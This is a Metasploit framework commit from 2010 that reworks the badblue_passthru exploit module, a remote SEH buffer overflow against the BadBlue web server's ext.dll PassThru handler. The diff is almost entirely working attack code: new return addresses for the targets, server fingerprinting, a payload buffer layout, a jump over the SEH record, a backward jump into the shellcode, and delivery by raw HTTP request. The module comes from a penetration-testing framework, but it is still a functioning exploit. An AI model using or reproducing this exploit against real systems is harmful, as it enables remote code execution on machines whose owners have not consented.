reworked module significantly, updated for latest installer from badblue.com, added http_fingerprint

git-svn-id: file:///home/svn/framework3/trunk@9705 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-07 06:54:20 +00:00 · 2010-07-07 06:54:20 +00:00 · 389259c5d4
parent 163d273dff
commit 389259c5d4
1 changed files with 40 additions and 14 deletions
--- a/modules/exploits/windows/http/badblue_passthru.rb
+++ b/modules/exploits/windows/http/badblue_passthru.rb
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Seh

 	def initialize(info = {})
 		super(update_info(info,
@ -40,34 +41,59 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'Space'    => 750,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3c\x3d\x3f\x5c",
 					'StackAdjustment' => -3500,
-					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					#'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
 					'DisableNops'	=>  'True',
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'BadBlue 2.72b Universal', { 'Ret' => 0x1003f2f3 } ],
+					# This is the version being distributed on badblue.com as of Jul 7th 2010
+					[ 'BadBlue EE 2.7 Universal', { 'Ret' => 0x10033f44 } ], # pop/pop/ret in ext.dll v1.0.0.1 (06a6dc81924ba94bfbbd00902d054db2)
+					[ 'BadBlue 2.72b Universal', { 'Ret' => 0x1003f2f3 } ]   # pop/pop/ret from ??
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Dec 10 2007'))
-
-		register_options(
-			[
-				Opt::RPORT(80)
-			], self.class)
 	end

 	def exploit
-		# Need to obfuscate the buffer a bit more. "\x96" is ghetto.
-		uri =  "/ext.dll?mfcisapicommand=PassThru&" + "\x96" * (4116 - payload.encoded.length)
-		uri << payload.encoded + Rex::Arch::X86.jmp_short(8) + make_nops(2) + [target.ret].pack('V')
-		uri << make_nops(12) + [0xe8, -850].pack('CV')
+		# NOTE: BadBlue doesn't give any HTTP headers when requesting '/', but it will if requesting /index.html
+		if not (http_fingerprint =~ /BadBlue\//)
+			raise RuntimeError, "The target server doesn't appear to be running BadBlue."
+		end
+
+		seh_offset = 4116
+		sploit = Rex::Text.pattern_create(seh_offset)
+		# Need to jump over the nul byte
+		seh = Rex::Arch::X86.jmp_short(8) + rand_text(2) + [target.ret].pack('V')
+		sploit << seh
+
+		plen = payload.encoded.length
+		sploit[seh_offset - 16 - plen, plen] = payload.encoded
+
+		# This pointer will force a crash when it is used in a lock instruction
+		ptr = rand_text(3)
+		ptr << [0x80|rand(256)].pack('C')
+		sploit[seh_offset - 8,4] = ptr
+
+		#sled = ("B" * 16) + Rex::Text.charset_exclude(payload_badchars) + ("C" * 16)
+		#sploit[16,sled.length] = sled
+		
+		# These two bytes get corrupted, so we can't use them.
+		sploit << rand_text(2)
+
+		# jump back to the payload
+		distance = 2 + 8 + 16 + plen
+		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{distance}").encode_string
+
+
+		# Build the final URI
+		uri = "/ext.dll?mfcisapicommand=PassThru&"
+		uri << sploit

 		print_status("Trying target %s..." % target.name)
-
-		send_request_raw({'uri' => uri,}, 5)
+		send_request_raw({ 'uri' => uri }, 5)

 		handler
 		disconnect